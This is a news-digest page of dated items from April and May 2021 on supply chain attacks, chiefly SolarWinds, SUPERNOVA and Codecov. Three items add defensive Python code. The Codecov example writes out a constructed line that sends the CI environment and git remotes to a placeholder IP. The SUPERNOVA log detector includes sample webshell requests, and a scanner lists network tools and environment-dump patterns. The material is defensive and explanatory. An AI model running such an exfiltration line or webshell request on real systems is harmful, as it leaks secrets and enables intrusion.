FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity

Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing TTPs of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. Agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.


_______________________________________________________________________________________

(May 7, 2021)


Ransomware, supply chain attacks show no sign of abating

Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.


_______________________________________________________________________________________

(May 7, 2021)


Further TTPs associated with SVR cyber actors

Organizations are advised to follow the advisory's mitigation advice and guidance, as well as the detection rules in its appendix, to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.


_______________________________________________________________________________________

(May 6, 2021)


Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia

U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.

Ref - CyberScoop 

_______________________________________________________________________________________

(May 5, 2021)


Twilio discloses breach caused by Codecov supply chain hack

Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.

Ref - TechTarget 

_______________________________________________________________________________________

(May 3, 2021)


New Hampshire pushes pause on creating supply chain authority

To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.

Ref - GovTech

_______________________________________________________________________________________

(May 3, 2021)


Stopping the next SolarWinds requires doing something different

The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.

Ref - DarkReading 

_______________________________________________________________________________________

(May 3, 2021)


Key indicators that the supply chain vendor has been breached

If a vendor does not provide clear and substantial responses to risk assessments, they could be concealing gaping holes in their information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If system tracking can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.

Ref - Upguard 

_______________________________________________________________________________________

(May 1, 2021)


More US agencies potentially hacked, this time with Pulse Secure exploits

At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.

Ref - ARS Technica 

_______________________________________________________________________________________

(April 30, 2021)


Key questions to consider to help mitigate against supply chain attacks

With the recent SolarWinds SunBurst exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.


_______________________________________________________________________________________

(April 30, 2021)


A tale of two hacks: from SolarWinds to Microsoft Exchange

The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.

Ref - ThreatPost 

_______________________________________________________________________________________

(April 29, 2021)


Finding the weakest link in the supply chain

An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(April 29, 2021)


A new PHP composer bug could enable widespread supply-chain attacks

The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.


_______________________________________________________________________________________

(April 29, 2021)


Biden preparing cybersecurity executive order in response to SolarWinds attack

President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.

Ref - The Hill 

_______________________________________________________________________________________

(April 28, 2021)


Minimizing the risk of supply chain attacks – best practice guidelines

Sophos provides several recommendations to minimize the risk of supply chain attacks: switch from a reactive to a proactive approach to cybersecurity, monitor for early signs of compromise, audit the supply chain, assess the security posture of all suppliers and business partners, and continually review IT security operations hygiene.

Ref - Sophos 

_______________________________________________________________________________________

(April 28, 2021)


Lawmakers want to create a reserve corps to respond to the next SolarWinds

A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.


_______________________________________________________________________________________

(April 28, 2021)


CISA issues guidance on defending against software supply chain attacks

The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).


_______________________________________________________________________________________

(April 28, 2021)


5 ways to protect software supply-chains from malicious attackers

Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted to repositories; having a plan for external services; and creating an on-premises and cloud strategy.

Ref - Radware

_______________________________________________________________________________________

(April 27, 2021)


Another SolarWinds lesson: hackers are targeting Microsoft authentication servers

During the SolarWinds intrusions, the attackers directly targeted AD FS servers to steal token-signing certificates, which let them forge SAML tokens. The new technique Mandiant describes does not require direct access to the AD FS server: the attacker impersonates one AD FS server talking to another in the farm and obtains its keys that way. This is not trivial, as it still requires credentials for an extremely privileged account. But given the capabilities of the actors behind SolarWinds, chief information security officers should treat these kinds of attacks as part of the threat landscape.

Ref - SC Magazine 
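Once an attacker holds the AD FS token-signing key, a forged SAML assertion carries a perfectly valid signature, so signature verification alone proves nothing. The following is an added example, not code from the page, Mandiant or Microsoft, of two cheap relying-party checks that still help: the signer must be the pinned token-signing certificate (any certificate embedded in the message is compared against the pin rather than trusted), and the assertion's validity window must not exceed what the IdP is configured to issue. The assertion, the certificate bytes and the one-hour lifetime policy are all constructed for the demo; XML-DSig signature verification is delegated to a library and not shown.

```python
"""Relying-party sanity checks for SAML assertions issued by an AD FS farm.

Added example, not from the page or Mandiant. Assumptions: the pinned
certificate bytes are a placeholder (not a real X.509 certificate), the IdP
policy issues one-hour tokens, and signature verification is done elsewhere.
"""
import base64
import hashlib
from datetime import datetime, timedelta, timezone
import xml.etree.ElementTree as ET

NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Placeholder DER bytes standing in for the farm's real token-signing
# certificate; a real deployment pins the thumbprint from federation metadata.
PINNED_CERT_DER = b"constructed placeholder: AD FS token-signing certificate"
PINNED_THUMBPRINT = hashlib.sha1(PINNED_CERT_DER).hexdigest()
MAX_TOKEN_LIFETIME = timedelta(hours=1)  # assumption: IdP policy issues 1-hour tokens


def _iso(dt):
    return dt.strftime("%Y-%m-%dT%H:%M:%SZ")


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def build_assertion(cert_der, not_before, not_on_or_after, subject="alice@example.test"):
    """Construct a minimal assertion (KeyInfo present, signature value omitted)."""
    cert_b64 = base64.b64encode(cert_der).decode()
    return (
        f'<saml:Assertion xmlns:saml="{NS["saml"]}" xmlns:ds="{NS["ds"]}" ID="_c0ffee" Version="2.0">'
        "<saml:Issuer>http://adfs.example.test/adfs/services/trust</saml:Issuer>"
        "<ds:Signature><ds:KeyInfo><ds:X509Data>"
        f"<ds:X509Certificate>{cert_b64}</ds:X509Certificate>"
        "</ds:X509Data></ds:KeyInfo></ds:Signature>"
        f"<saml:Subject><saml:NameID>{subject}</saml:NameID></saml:Subject>"
        f'<saml:Conditions NotBefore="{_iso(not_before)}" NotOnOrAfter="{_iso(not_on_or_after)}"/>'
        "</saml:Assertion>"
    )


def check_assertion(xml_text, now):
    """Return the list of policy violations; an empty list means the checks passed."""
    root = ET.fromstring(xml_text)
    problems = []

    # The embedded certificate is never trusted on its own: it must equal the pin.
    cert_el = root.find(".//ds:X509Certificate", NS)
    embedded = base64.b64decode(cert_el.text.strip()) if cert_el is not None and cert_el.text else b""
    if hashlib.sha1(embedded).hexdigest() != PINNED_THUMBPRINT:
        problems.append("signer is not the pinned token-signing certificate")

    cond = root.find("saml:Conditions", NS)
    if cond is None:
        return problems + ["assertion has no Conditions element"]
    not_before = _parse(cond.get("NotBefore"))
    not_on_or_after = _parse(cond.get("NotOnOrAfter"))
    if not (not_before <= now < not_on_or_after):
        problems.append("assertion is outside its validity window")
    # Forged tokens are often minted with generous lifetimes; the IdP never issues those.
    if not_on_or_after - not_before > MAX_TOKEN_LIFETIME:
        problems.append(f"validity window of {not_on_or_after - not_before} exceeds IdP policy")
    return problems


# Constructed inputs for the demo.
NOW = datetime(2021, 4, 27, 12, 0, 0, tzinfo=timezone.utc)
LEGIT = build_assertion(PINNED_CERT_DER, NOW - timedelta(minutes=5), NOW + timedelta(minutes=55))
FORGED = build_assertion(b"attacker-controlled placeholder certificate",
                         NOW - timedelta(days=1), NOW + timedelta(days=365))

if __name__ == "__main__":
    print("legit :", check_assertion(LEGIT, NOW))
    print("forged:", check_assertion(FORGED, NOW))
```

A well-resourced attacker who has the real key will embed the real certificate and copy normal lifetimes, so these checks catch sloppy forgeries only; the durable controls are rotating the token-signing certificate after any suspected exposure and monitoring the AD FS servers themselves.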

_______________________________________________________________________________________

(April 27, 2021)


Software supply chain may get you by exploiting Open-Source libraries

Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.


_______________________________________________________________________________________

(April 27, 2021)


Defending against software supply chain attacks

The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.

Ref - CISA 

_______________________________________________________________________________________

(April 27, 2021)


DFS report identifies key cybersecurity measures to reduce supply chain risk

The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of the New York’s financial services industry’s response to the supply chain attack of the IT company SolarWinds. During the SolarWinds Attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems. 


_______________________________________________________________________________________

(April 26, 2021)


SolarWinds, Microsoft hacks prompt focus on Zero-Trust security

Analysis of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., from the CISA, the NSA, and the FBI found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.


_______________________________________________________________________________________

(April 26, 2021)


CISA and NIST release new interagency resource to defend against supply chain attacks

To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.

Ref - CERT-CISA 

_______________________________________________________________________________________

(April 26, 2021)


Another top VPN is reportedly being used to spread SolarWinds hack

Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.

Ref - TechRadar 

_______________________________________________________________________________________

(April 25, 2021)


Stopping SolarWinds’ style mega hacks, but preserving democracy

The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.


_______________________________________________________________________________________

(April 24, 2021)


HashiCorp is the latest victim of the Codecov supply-chain attack

HashiCorp, maker of Vault and other open-source infrastructure tools, has disclosed a security incident resulting from the recent Codecov attack. HashiCorp, a Codecov customer, stated that the Codecov supply-chain attack, which was aimed at collecting developer credentials, led to the exposure of HashiCorp's GPG signing key, the private key used to sign the hashes of its release artifacts.


_______________________________________________________________________________________

(April 23, 2021)


Senators introduce legislation to protect critical infrastructure against attack

Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
 
Ref - The Hill 

_______________________________________________________________________________________

(April 23, 2021)


Passwordstate password manager hacked in a supply chain attack

Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.


_______________________________________________________________________________________

(April 23, 2021)


Supply chain attack risk looms over three million mobile app users of CocoaPods

A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.

Ref - PortSwigger 

_______________________________________________________________________________________

(April 23, 2021)


The new analysis uncovers extensive SolarWinds attack infrastructure

Cybersecurity researchers that have been tracking the infrastructure footprint of SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.

Ref - TechRadar 

_______________________________________________________________________________________

(April 22, 2021)


SUPERNOVA redux, with a portion of masquerading

This SUPERNOVA incident has a few interesting traits. The first is that the adversary used US-based residential IP addresses to appear as US-based employees, then leveraged valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server, where the SUPERNOVA webshell was installed.

Ref - Splunk 

_______________________________________________________________________________________

(April 22, 2021)


CISA identifies Supernova malware during incident response

CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.

Ref - CISA 
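SUPERNOVA was delivered as a trojanized copy of Orion's LogoImageHandler.ashx assembly that compiled and ran C# source supplied in the query string, using the parameters `clazz`, `method`, `args` and `codes` (as documented in the public malware analyses, including CISA's). The legitimate handler has no reason to receive those parameters, which makes web-server logs a good place to look. The following is an added example, not code from CISA or the page: a parser for IIS W3C logs that flags requests to that handler carrying any of the webshell parameters. The log excerpt is constructed, including the benign `id=` request shape and the placeholder parameter values.

```python
"""Flag SUPERNOVA-style requests in IIS W3C logs from a SolarWinds Orion server.

Added example, not from CISA's report or the page. Assumptions: the log uses
the standard W3C format with a #Fields: header; the sample lines, the benign
id= request and the parameter values are constructed.
"""
from urllib.parse import parse_qs

# Query parameters the trojanised handler accepted (per public analyses).
WEBSHELL_PARAMS = {"clazz", "method", "args", "codes"}

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-02-03 09:14:02 10.0.0.5 GET /Orion/Login.aspx - 443 - 10.0.0.23 Mozilla/5.0 200
2021-02-03 09:14:09 10.0.0.5 GET /Orion/LogoImageHandler.ashx id=1 443 - 10.0.0.23 Mozilla/5.0 200
2021-02-03 09:31:44 10.0.0.5 GET /Orion/LogoImageHandler.ashx clazz=Exec&method=Run&args=whoami&codes=dXNpbmcgU3lzdGVtOw%3D%3D 443 - 198.51.100.7 Mozilla/5.0 200
2021-02-03 09:32:01 10.0.0.5 POST /Orion/LogoImageHandler.ashx codes=dXNpbmc%3D 443 - 198.51.100.7 python-requests/2.25 200
"""


def parse_iis_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # truncated line: skip rather than misalign columns
        yield dict(zip(fields, values))


def supernova_hits(text):
    """Return requests to the logo handler that carry webshell parameters."""
    hits = []
    for rec in parse_iis_w3c(text):
        if not rec.get("cs-uri-stem", "").lower().endswith("/logoimagehandler.ashx"):
            continue
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        params = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
        matched = params & WEBSHELL_PARAMS
        if matched:
            hits.append({
                "when": f"{rec['date']} {rec['time']}",
                "client": rec.get("c-ip"),
                "method": rec.get("cs-method"),
                "params": sorted(matched),
            })
    return hits


if __name__ == "__main__":
    for hit in supernova_hits(SAMPLE_LOG):
        print(hit)
```

Pair the log search with a check of the handler assembly on disk: a SUPERNOVA-infected server carries a LogoImageHandler DLL whose hash differs from the one SolarWinds shipped, and the log hits tell you which client addresses to pivot on next.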

_______________________________________________________________________________________

(April 22, 2021)


SolarWinds hack analysis reveals 56% boost in command server footprint

The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages. 

Ref - ZDNet 

_______________________________________________________________________________________

(April 22, 2021)


Software supply chain may get you by exploiting third-party applications

Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.


_______________________________________________________________________________________

(April 22, 2021)


Supernova threat actors masqueraded as remote workers to access breached network

Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.

Ref - DarkReading 

_______________________________________________________________________________________

(April 21, 2021)


White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents

Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. They also include involving private sector organizations in the response to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.

Ref - ZDNet 

_______________________________________________________________________________________

(April 20, 2021)


A software supply chain may take you down via vendor compromise

Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.


_______________________________________________________________________________________

(April 20, 2021)


The wide web of nation-state hackers attacking the US

As both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether from ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.

Ref - TechTarget 

_______________________________________________________________________________________

(April 20, 2021)

Codecov supply chain attack has echoes of SolarWinds

To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.


_______________________________________________________________________________________

(April 20, 2021)


Hundreds of networks reportedly hacked in Codecov supply-chain attack

In new reporting by Reuters, investigators stated that hundreds of customer networks have been breached in the incident, expanding the scope of the breach well beyond Codecov's own systems. Codecov had suffered a supply-chain attack that went undetected for over two months.


_______________________________________________________________________________________

(April 19, 2021)


White House stands down SolarWinds, Microsoft Exchange cyber response groups

Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.

Ref - GCN 

_______________________________________________________________________________________

(April 19, 2021)


SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator

North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.

Ref - CPO Magazine 

_______________________________________________________________________________________

(April 19, 2021)


Positive Technologies denies involvement in SolarWinds attack

Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.

Ref - TechRadar 

_______________________________________________________________________________________

(April 19, 2021)


XCSSET malware now targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.


_______________________________________________________________________________________

(April 19, 2021)


Codecov hack could be another SolarWinds-type attack

US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

Ref - Techradar

_______________________________________________________________________________________

(April 19, 2021)


Zero-trust is the best defense against third-party attacks

Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be trusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.

Ref - ZDNet

_______________________________________________________________________________________

(April 19, 2021)


Next SolarWinds crisis could happen very soon

The SolarWinds cyber attack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discusses how companies can avoid a similar supply-chain crisis.


_______________________________________________________________________________________

(April 17, 2021)


SolarWinds hacking campaign puts Microsoft in the hot seat

Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.

Ref - Yahoo 

_______________________________________________________________________________________

(April 17, 2021)


Six out of 11 EU agencies running Solarwinds Orion software were hacked

CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. However, CERT-EU did not reveal the names of the agencies that installed the tainted Orion updates. CERT-EU said that some agencies provided only limited details on the attacks, and that in other cases the network logs needed to hunt for clues about the hackers’ actions were not available.


_______________________________________________________________________________________

(April 17, 2021)


Biden upends U.S. convention on cyber espionage

President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. The administration also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.


_______________________________________________________________________________________

(April 16, 2021)


Commerce Dept. may have found SolarWinds backdoor in Aug. 2020

Last month, Microsoft and FireEye identified a file as a newly discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search of VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had uploaded a file with that same name and file hashes.


_______________________________________________________________________________________

(April 16, 2021)


More countries officially blame Russia for SolarWinds attack

The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.


_______________________________________________________________________________________

(April 16, 2021)


The untold story of the SolarWinds hack

Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.

Ref - NPR 

_______________________________________________________________________________________

(April 15, 2021)


The U.S. imposes sanctions on Russia over cyber-attacks

The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aim to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
 
Ref - BBC

_______________________________________________________________________________________

(April 15, 2021)


Codecov Bash Uploader tool compromised in supply chain hack

At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.
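The Bash Uploader pattern, fetching a script from the vendor at build time and piping it straight into a shell, is what made the tampered script so effective: every CI run executed whatever was hosted. The following is an added example, not Codecov's code or the page's own, showing the two controls that would have caught it: checking the fetched script against a digest pinned out of band, and, as a tripwire, scanning it for lines that ship the build environment off-host, which is exactly what the injected line did. Both scripts are constructed; the injected line is shaped like the one Codecov disclosed, with the attacker host replaced by the documentation address 203.0.113.10.

```python
"""Integrity checks for a vendor-supplied CI helper script before executing it.

Added example, not from Codecov or the page. Assumptions: the clean script,
the tampered copy and the pinned digest are constructed here; in a real
pipeline the digest is a literal copied from the vendor's published checksum.
"""
import hashlib
import re

CLEAN_SCRIPT = """#!/usr/bin/env bash
# constructed stand-in for an uploader: sends a coverage report to the vendor
set -euo pipefail
report="${1:-coverage.xml}"
curl -sS -X POST --data-binary @"$report" "https://uploader.example.test/upload/v4?commit=$(git rev-parse HEAD)"
"""

# Same script with one injected line: it POSTs `git remote -v` plus the whole
# environment (CI secrets included) to an attacker host and swallows failures.
TAMPERED_SCRIPT = CLEAN_SCRIPT.replace(
    'report="${1:-coverage.xml}"\n',
    'report="${1:-coverage.xml}"\n'
    'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload/v2 || true\n',
)

# Digest pinned when the script was last reviewed (computed here only because
# the clean script is constructed inline).
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT.encode()).hexdigest()

NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat)\b")
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|set)\b")       # $(env), $(printenv), $(set)
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")  # URL with a bare IPv4 host


def sha256_matches(script_text, pinned_sha256):
    """The real control: refuse to run anything whose digest is not the pinned one."""
    return hashlib.sha256(script_text.encode()).hexdigest() == pinned_sha256


def suspicious_lines(script_text):
    """Tripwire: a network client on the same line as an environment dump, or
    talking to a bare IP address. Heuristic only; obfuscated variants will slip
    past it, which is why the digest check comes first."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), 1):
        if line.lstrip().startswith("#") or not NET_TOOL.search(line):
            continue
        if ENV_DUMP.search(line) or RAW_IP_URL.search(line):
            hits.append((number, line.strip()))
    return hits


def vet_script(script_text, pinned_sha256):
    """Combined verdict for a fetched script; run it only if digest_ok is True."""
    return {
        "digest_ok": sha256_matches(script_text, pinned_sha256),
        "suspicious": suspicious_lines(script_text),
    }


if __name__ == "__main__":
    print("clean   :", vet_script(CLEAN_SCRIPT, PINNED_SHA256))
    print("tampered:", vet_script(TAMPERED_SCRIPT, PINNED_SHA256))
```

The digest check is the control that matters; pin the vendor's published checksum in the pipeline configuration and fail the build on mismatch, so that a silent change to the hosted script cannot reach a shell. The pattern scan is cheap insurance for the day the pin is updated without anyone reading the diff.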


_______________________________________________________________________________________

(April 15, 2021)


Biden unveiled Russia sanctions over SolarWinds hack 

Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.


_______________________________________________________________________________________

(April 14, 2021)


The misuse of X.509 certificates & keys in SolarWinds hack

A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust. 


_______________________________________________________________________________________

(April 14, 2021)


Advanced supply chain attacks need a strategic counter-defense policy

